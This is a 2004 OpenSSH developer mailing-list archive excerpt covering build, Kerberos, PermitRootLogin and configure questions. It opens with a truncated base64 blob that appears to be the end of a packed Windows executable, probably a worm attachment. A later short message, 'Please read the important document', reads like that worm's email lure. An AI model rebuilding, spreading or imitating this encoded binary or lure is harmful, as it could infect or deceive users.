EBYTDwyWZVmWCTcLNBcUs5ZlWRURbwOl/0P+y1BFTAEEAFn0MEDgAA8CCwECOKDq9w4KAwDk OthZ905WgA0qEA8EM7lj3ywHHwEMA9ubSzaw7w8kEAcGN4HLsxwoaYxwYA1qhdwGAmAefAEX bNdxLsZ0B5ROkOcg2FzYBEUgLnK692wOAiMOYBQnVG6x7kJAAi4mJ9zibUoGaYB0wE8bm32l c8VKDfN7lE8A/34rGzBrDZJ0AQAAAAAAAACABP8AAAAAAAAAAAAAAGC+FVBBAI2+67/+/1eD zf/rEJCQkJCQkIoGRogHRwHbdQeLHoPu/BHbcu24AQAAAAHbdQeLHoPu/BHbEcAB23PvdQmL HoPu/BHbc+QxyYPoA3INweAIigZGg/D/dHSJxQHbdQeLHoPu/BHbEckB23UHix6D7vwR2xHJ dSBBAdt1B4seg+78EdsRyQHbc+91CYseg+78Edtz5IPBAoH9APP//4PRAY0UL4P9/HYPigJC iAdHSXX36WP///+QiwKDwgSJB4PHBIPpBHfxAc/pTP///16J97lEAQAAigdHLOg8AXf3gD8F dfKLB4pfBGbB6AjBwBCGxCn4gOvoAfCJB4PHBYnY4tmNvgBwAQCLBwnAdEWLXwSNhDBknQEA AfNQg8cI/5bwnQEAlYoHRwjAdNyJ+XkHD7cHR1BHuVdI8q5V/5b0nQEACcB0B4kDg8ME69j/ lvidAQBh6beo/v8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAgADAAAAIAAAgA4AAABgAACAAAAAAAAAAAAAAAAAAAABAAEAAAA4AACAAAAAAAAA AAAAAAAAAAABAAcEAABQAAAApKABAKgMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQBlAAAA eAAAgAAAAAAAAAAAAAAAAAAAAQAHBAAAkAAAAFCtAQAUAAAAAAAAAAAAAACgcAEAKAAAACAA AABAAAAAAQAYAAAAAACADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAICAgMDAwMDAwMDAwMDAwMDAwMDAwMDA wMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAICAgP////////////////////////////////////////// /////////////////////////////////////////////8DAwAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAICAgP////////////////////////////////////////////////////////// /////////////////////////////8DAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAICAgP// //////////////////////////////////////////////////////////////////////// /////////////8DAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAICAgP////////////////// /////////////////////////////////8DAwMDAwMDAwMDAwMDAwMDAwP///////////8DA wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAICAgP////////////////////////////////// /////////////////////////////////////////////////////8DAwAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAICAgP///////////8DAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDA wMDAwMDAwMDAwMDAwMDAwMDAwP///////////8DAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AICAgP////////////////////////////////////////////////////////////////// /////////////////////8DAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAICAgP////////// /8DAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwP////// /////8DAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAICAgP////////////////////////// /////////////////////////////////////////////////////////////8DAwAAAAP8A AAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAMDAwMDAwMDA wMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwP///////////8DAwAAAAAAAAP8AAAAAAP8AAAAA AP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAP////////////////////////// /////////////////////////////8DAwAAAAP8AAAAAAP////////////////////////// //////////////////////8AAAAAAMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDA wP///////////8DAwAAAAAAAAP8AAP////8AAAAAAP8AAP////8AAAAAAP8AAAAAAP////// /////wAAAP8AAP///////////////////////////////////////////////////////8DA wAAAAP8AAAAAAP///wAAAP8AAAAAAP///wAAAP8AAAAAAP8AAMDAwP////////8AAAAAAMDA wMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwP///////////8DAwAAAAAAAAP8AAP// //8AAAAAAP8AAP////8AAAAAAP8AAAAAAICAgP///////wAAAP8AAP////////////////// /////////////////////////////////////8DAwAAAAP8AAAAAAP///wAAAP8AAAAAAP8A AAAAAP8AAAAAAP8AAAAAAP////////8AAAAAAMDAwMDAwP///////8DAwMDAwMDAwMDAwMDA wMDAwMDAwP///////////8DAwAAAAAAAAP8AAP////8AAAAAAP8AAAAAAP8AAAAAAP8AAAAA AP8AAMDAwP///wAAAP8AAP///////////////8DAwMDAwMDAwP///8DAwMDAwMDAwP////// /////8DAwAAAAP8AAAAAAP///wAAAP8AAP////8AAAAAAP8AAP////8AAAAAAICAgP////8A AAAAAMDAwMDAwP///////8DAwMDAwP///////////////8DAwP///////////8DAwAAAAAAA AP8AAAAAAP8AAAAAAP///wAAAP8AAAAAAP///wAAAP8AAAAAAP///wAAAP8AAP////////// /////8DAwMDAwMDAwP///////8DAwMDAwP///////////8DAwAAAAP8AAAAAAP8AAAAAAP8A AP////8AAAAAAP8AAP////8AAAAAAP8AAAAAAP8AAAAAAMDAwMDAwP///////8DAwP////// /////////////8DAwP///////////8DAwAAAAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAA AP8AAAAAAP8AAAAAAP8AAAAAAP8AAP///////////////8DAwMDAwP///////4CAgAAAAAAA AAAAAAAAAAAAAAAAAAAAAP8AAAAAAP////////////////////////////////////////// //////8AAAAAAP///////////////8DAwMDAwMDAwMDAwICAgP///////////8DAwICAgAAA AAAAAAAAAP8AAP///////////////////////////////////////////////wAAAP8AAP// /////////////8DAwMDAwMDAwMDAwICAgP///////8DAwICAgAAAAAAAAAAAAP8AAAAAAP8A AAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP////////////////// /////////////4CAgP///8DAwICAgAAAAAAAAAAAAAAAAAAAAP8AAAAAAP8AAAAAAP8AAAAA AP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAP///////////////////////////////4CA gMDAwICAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAICAgP////////// /////////////////////////////////////////////////////4CAgICAgAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAICAgP////////////////////////// /////////////////////////////////////4CAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA gICAgICAgICAgICAgICAgICAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP/////+AAAA/gAAAP4AAAD+AAAA/gAAAP4A AAD+AAAA/gAAAP4AAAD+AAAA/gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAEAAAADAAAABwAAAA/+AAAf/gAAP/4AAH//////SH0BAAAA AQABACAgAAABABgAqAwAAAEAAAAAAAAAAAAAAAAAKK4BAPCtAQAAAAAAAAAAAAAAAAA1rgEA AK4BAAAAAAAAAAAAAAAAAEKuAQAIrgEAAAAAAAAAAAAAAAAAT64BABCuAQAAAAAAAAAAAAAA AABargEAGK4BAAAAAAAAAAAAAAAAAGauAQAgrgEAAAAAAAAAAAAAAAAAAAAAAAAAAABwrgEA fq4BAI6uAQAAAAAAnK4BAAAAAACqrgEAAAAAALyuAQAAAAAAyK4BAAAAAAADAACAAAAAAEtF Uk5FTDMyLkRMTABBRFZBUEkzMi5kbGwAaXBobHBhcGkuZGxsAFVTRVIzMi5kbGwAV0lOSU5F VC5kbGwAV1MyXzMyLmRsbAAATG9hZExpYnJhcnlBAABHZXRQcm9jQWRkcmVzcwAARXhpdFBy b2Nlc3MAAABSZWdDbG9zZUtleQAAAEdldE5ldHdvcmtQYXJhbXMAAHdzcHJpbnRmQQAAAElu dGVybmV0R2V0Q29ubmVjdGVkU3RhdGUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= --21665162-- From f_mohr at yahoo.de Tue Mar 30 01:05:30 2004 From: f_mohr at yahoo.de (Frank Mohr) Date: Mon, 29 Mar 2004 17:05:30 +0200 Subject: Flags in pam_password_change_required() (auth-pam.c) References: <40680CB3.7280AA50@yahoo.de> Message-ID: <40683B3A.EBB9AE5F@yahoo.de> sorry ... my fault these are all "no_*" flags that get true with the 2nd bit set writing down the question sometimes helps to find the answer by myself. frank Frank Mohr wrote: > > Hi > > I just "stumbled" over the flags settings in > pam_password_change_required(). > As far as I looked over the OpenSSH code, setting/resetting the 2nd bit > in those flags from auth-options.c whould only make sense if the flags > are checked to be 0/1 in the remaining OpenSSH code. > > Frank From mld12 at uark.edu Tue Mar 30 08:09:06 2004 From: mld12 at uark.edu (mld12 at uark.edu) Date: Mon, 29 Mar 2004 16:09:06 -0600 Subject: openssh and SEAM (Kerberos) Message-ID: <17554831757c55.1757c551755483@uark.edu> I'm trying to get openssh to work with SEAM(Solaris Enterprise Authentication Mechanism) on Solaris 9. I have a few questions. Any help would be appreciated. I am working with openssh 3.8. 1. First of all, does anyone know if it is possible to get openssh working with SEAM? 2. Which options do i need to use when compiling openssh? Do i need to use --with-kerberos5=kerbpath or --with-pam or both? 3. Which options need to be enabled in the sshd_config? KerberosAuthentication? GSSAPIAuthentication? 4. Which options are needed in ssh_config? GSSAPIAuthentication yes? GSSAPIDelegateCredentials yes? 5. Does openssh rely on the pam_krb5 module? 6. Are there any good sources of information regarding the integration of SEAM and openssh? I have tried many combinations of these options but have been unsuccessful so far. Maybe I'm missing something. I've looked at docs.sun.com with no luck. I have browsed the mailing list archives at openssh.org (that's where i got some of the options listed above) but again, no luck. I did download the kerberized telnet, rlogin, and ftp package from sun, and it works fine. Any insight would be appreciated. Thanks in advance for any help provided. Matthew L. Davis mld12 at uark.edu From Darren.Moffat at Sun.COM Tue Mar 30 08:21:14 2004 From: Darren.Moffat at Sun.COM (Darren J Moffat) Date: Mon, 29 Mar 2004 14:21:14 -0800 Subject: openssh and SEAM (Kerberos) In-Reply-To: <17554831757c55.1757c551755483@uark.edu> References: <17554831757c55.1757c551755483@uark.edu> Message-ID: <4068A15A.2080807@Sun.COM> mld12 at uark.edu wrote: > I'm trying to get openssh to work with SEAM(Solaris > Enterprise Authentication Mechanism) on Solaris 9. > I have a few questions. Any help would be appreciated. > I am working with openssh 3.8. > > 1. First of all, does anyone know if it is possible > to get openssh working with SEAM? Yes it is. You should be able to get it to work by ensuring GSS support is enabled. > 2. Which options do i need to use when compiling > openssh? Do i need to use --with-kerberos5=kerbpath > or --with-pam or both? SEAM does not expose any Kerberos APIs only GSS. > 5. Does openssh rely on the pam_krb5 module? No. Describe what problems you are having and give the debug output from the client and server. -- Darren J Moffat From dtucker at zip.com.au Tue Mar 30 12:14:55 2004 From: dtucker at zip.com.au (Darren Tucker) Date: Tue, 30 Mar 2004 12:14:55 +1000 Subject: PermitRootLogin issues In-Reply-To: <405E3673.9080000@verizon.net> References: <405E3673.9080000@verizon.net> Message-ID: <4068D81F.9020400@zip.com.au> Stephen Roylance wrote: > I'm currently experiencing the issue laid out in this thread from last > year: > http://marc.theaimsgroup.com/?l=openssh-unix-dev&m=106908815129641&w=2 > > The discussion that ensued resulted in a number of ideas on how best to > 'fix' this issue. The two that seemed most reasonable were: > 1. implement a pubkey-only option to PermitRootLogin that would only > allow root to login using pubkey authentication. > 2. implement a more flexible arrangement where a list of allowed > authentication methods could passed to PermitRootLogin. There is an open bug (#701) for this [1]. > I looked through the code and it seems that both are straightforward to > code, but obviously 1 is much less work. I coded up an implemetation of > pubkey-only that works for me, and it's attached. I'm willing to work > on option 2, but since that's quite a bit more work, I'd like some > assurance that that is the _right_ way before I start on it. I have just added this to the bug: [quote] The current plan is to switch away from the current "without-password" to a positive list of allowed methods, e.g. PermitRootLogin pubkey,hostbased,keyboard-interactive and keep "without-password" as an alias for something like "pubkey,hostbased" One thing that isn't clear is whether or not keyboard-interactive should specify the specific "devices", eg keyboard-interactive/pam. [/quote] Good patches implementing the above are likely to be accepted. > I think some solution needs to be merged ASAP. I've seen the > recommendation to use without-password if root logins for scripting must > be allowed in various security docs. With more sites using PAM and > non-typical authentication methods (LDAP, winbind), it can be a nasty > shock (or worse, completely unnoticed) to an administrator when that > option doesn't work as they expect. [1] http://bugzilla.mindrot.org/show_bug.cgi?id=701 -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From djm at mindrot.org Tue Mar 30 14:02:44 2004 From: djm at mindrot.org (Damien Miller) Date: Tue, 30 Mar 2004 14:02:44 +1000 Subject: environ problem in 3.8p1 In-Reply-To: References: <200403071542.i27FgxNh023809@mx1.cs.umb.edu> <404C4DF5.7000800@zip.com.au> <404FCCBF.8040402@mindrot.org> Message-ID: <4068F164.9010405@mindrot.org> Damien Miller wrote: > In his ignorance, on Thu, 11 Mar 2004, Damien Miller mistakenly wrote: > > >>No, the protocol does not include a way to transmit more than the >>terminal type ($TERM). > > Markus pointed out that I am wrong: protocol 2 has a request to pass > environment variables, which we don't implement. There is now a patch to implement environment passing in: http://bugzilla.mindrot.org/show_bug.cgi?id=815 The patch is against -current, but if you are lucky it should apply against 3.8p1 too. This is subject to change, but needs testing with other SSH implementations. -d From Frank.Beckmann at vodafone.com Tue Mar 30 22:15:41 2004 From: Frank.Beckmann at vodafone.com (Frank Beckmann) Date: Tue, 30 Mar 2004 14:15:41 +0200 Subject: All SSH Version Message-ID: <406964ED.9080300@vodafone.com> Hello :-) all ssh Version we are use have the same Problem: when we start a deamon process, the windows hang on exit. OS Solaris 6 and 8 Solaris 9 and 10 come with a SUN emplentation of your openssh, the shell dosent hang on exit.... The Workarounds in the Web dosent fix the Problem... Frank -- kind regards / Mit freundlichen Gr??en Frank Beckmann Infrastructure Service Management _______________________________________ Vodafone D2 GmbH Prozess T O I U Technical Operations Infrastructure UNIX Am Seestern 4 / E7 Raum 14 D-40547 D?sseldorf Telefon:+49 (0)211-5 33 57 58 Fax: +49 (0)211-5 33 14 51 Frank.Beckmann at vodafone.com From djm at mindrot.org Tue Mar 30 22:38:44 2004 From: djm at mindrot.org (Damien Miller) Date: Tue, 30 Mar 2004 22:38:44 +1000 Subject: All SSH Version In-Reply-To: <406964ED.9080300@vodafone.com> References: <406964ED.9080300@vodafone.com> Message-ID: <40696A54.3020506@mindrot.org> Frank Beckmann wrote: > Hello :-) > > all ssh Version we are use have the same Problem: > > when we start a deamon process, the windows hang on exit. http://bugzilla.mindrot.org/show_bug.cgi?id=52 > OS Solaris 6 and 8 > > Solaris 9 and 10 come with a SUN emplentation of your openssh, the shell > dosent hang on exit.... It breaks other things. > The Workarounds in the Web dosent fix the Problem... We will soon start testing the patch at http://bugzilla.mindrot.org/show_bug.cgi?id=52 It looks promising. -d From dtucker at zip.com.au Tue Mar 30 22:40:33 2004 From: dtucker at zip.com.au (Darren Tucker) Date: Tue, 30 Mar 2004 22:40:33 +1000 Subject: All SSH Version In-Reply-To: <406964ED.9080300@vodafone.com> References: <406964ED.9080300@vodafone.com> Message-ID: <40696AC1.80005@zip.com.au> Frank Beckmann wrote: > all ssh Version we are use have the same Problem: > > when we start a deamon process, the windows hang on exit. See: http://bugzilla.mindrot.org/show_bug.cgi?id=52 Make sure your deamons close all their fds, especially stdin, stdout and stderr. > OS Solaris 6 and 8 > > Solaris 9 and 10 come with a SUN emplentation of your openssh, the shell > dosent hang on exit.... There is some evidence that this whatever SunSSH does causes other problems: http://bugzilla.mindrot.org/show_bug.cgi?id=813 BTW please don't use the openssh@ address for Portable bug reports unless they are security exposures. -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From dberezin at acs.rutgers.edu Wed Mar 31 07:32:04 2004 From: dberezin at acs.rutgers.edu (Dmitry Berezin) Date: Tue, 30 Mar 2004 16:32:04 -0500 Subject: ssh-add Message-ID: <006b01c4169e$7320f4c0$5bd90680@acsdev78> I?m trying to have ssh-agent started for a particular user on the Solaris 8 server when the server boots up, so that I could run some SCPs from cron and use publickey authentication with encrypted key. With OpenSSH version 3.8p1 ssh-add takes the pass-phrase from standard input, so I can automate ssh-agent startup, but with the slightly older versions of OpenSSH this does not work. Is this a feature that was recently implemented or a bug that will be fixed later on (and I can not rely on having this functionality in a future)? I am not sure if I am doing this conceptually correct in the first place though ? ? Thank you, ? ? -Dmitry. ? From shall at nebraska.edu Wed Mar 31 07:45:36 2004 From: shall at nebraska.edu (Steve Hall) Date: Tue, 30 Mar 2004 15:45:36 -0600 Subject: Config failure with 3.8p1 on AIX Message-ID: Hello, I have noted the following failure in the configure script for 3.8p1. The apparent error is -------------------------------------------------------------------------------------------------- configure:5911: cc -E conftest.c "configure", line 5908.10: 1506-296 (S) #include file not found. configure:5917: $? = 1 configure: failed program was: #line 5907 "configure" #include "confdefs.h" #include configure:5936: result: no configure:5941: error: *** zlib.h missing - please install first or check config .log ** -------------------------------------------------------------------------------------------------- The configure command (cc -E) is being invoked without the option -I/usr/local/include. This is not a problem with my previous (and current) copy of 3.7.p2. (I reconfigured, and regenerated for SSL 9.7.d ). I can bypass the problem by setting CPPFLAGS=-I/usr/local/include but wonder if I have missed some change to instructions since I have to do this with 3.8p1 but did not for 3.7p2. The environment is AIX 5.1 ML005, VisualAge/C/C++ v5 (fixes current as of 11/03) Zlib 1.1.4 (zlib.h is in /usr/local/include) configure options are ; ./configure --with-tcp-wrappers --with-prngd-socket=/var/run/egd-pool Has anyone else seen this ?? Thanks , Steve Steve Hall (shall at nebraska.edu) Computing Services Network University of Nebraska From erik at bosrup.com Wed Mar 31 02:20:54 2004 From: erik at bosrup.com (erik at bosrup.com) Date: Tue, 30 Mar 2004 18:20:54 +0200 Subject: your product Message-ID: <20040330222039.E5C5427C187@shitei.mindrot.org> Please read the important document. From dtucker at zip.com.au Wed Mar 31 10:05:06 2004 From: dtucker at zip.com.au (Darren Tucker) Date: Wed, 31 Mar 2004 10:05:06 +1000 Subject: Config failure with 3.8p1 on AIX In-Reply-To: References: Message-ID: <406A0B32.3040007@zip.com.au> Steve Hall wrote: > Hello, > I have noted the following failure in the configure script for 3.8p1. The > apparent error is [...] > configure:5941: error: *** zlib.h missing - please install first or check You have a zlib.a in /usr/lib but don't have the corresponsing zlib.h in /usr/include. > The configure command (cc -E) is being invoked without the option > -I/usr/local/include. > > This is not a problem with my previous (and current) copy of 3.7.p2. (I > reconfigured, and regenerated for SSL 9.7.d ). > > I can bypass the problem by setting CPPFLAGS=-I/usr/local/include but > wonder if I have > missed some change to instructions since I have to do this with 3.8p1 but > did not for 3.7p2. Configure no longer automatically searches /usr/local/{lib,include} by default. If your zlib is in /usr/local (it sounds like it is) you can use "./configure --with-zlib=/usr/local" -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From dtucker at zip.com.au Wed Mar 31 10:08:40 2004 From: dtucker at zip.com.au (Darren Tucker) Date: Wed, 31 Mar 2004 10:08:40 +1000 Subject: Config failure with 3.8p1 on AIX In-Reply-To: <406A0B32.3040007@zip.com.au> References: <406A0B32.3040007@zip.com.au> Message-ID: <406A0C08.6010302@zip.com.au> Darren Tucker wrote: > Configure no longer automatically searches /usr/local/{lib,include} by > default. Correction: configure will search /usr/local *if* it doesn't find zlib elsewhere. You have zlib.a in /usr/lib, so this doesn't happen. -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From tim at multitalents.net Wed Mar 31 10:14:15 2004 From: tim at multitalents.net (Tim Rice) Date: Tue, 30 Mar 2004 16:14:15 -0800 (PST) Subject: Config failure with 3.8p1 on AIX In-Reply-To: References: Message-ID: On Tue, 30 Mar 2004, Steve Hall wrote: [snip] > The configure command (cc -E) is being invoked without the option > -I/usr/local/include. > > This is not a problem with my previous (and current) copy of 3.7.p2. (I > reconfigured, and regenerated for SSL 9.7.d ). > > I can bypass the problem by setting CPPFLAGS=-I/usr/local/include but > wonder if I have > missed some change to instructions since I have to do this with 3.8p1 but > did not for 3.7p2. Here is the relevant entry in ChangeLog 20040123 - (tim) [configure.ac] Remove hard coded -L/usr/local/lib and -I/usr/local/include. Users can do LDFLAGS="-L/usr/local/lib" \ CPPFLAGS="-I/usr/local/include" ./configure if needed. -- Tim Rice Multitalents (707) 887-1469 tim at multitalents.net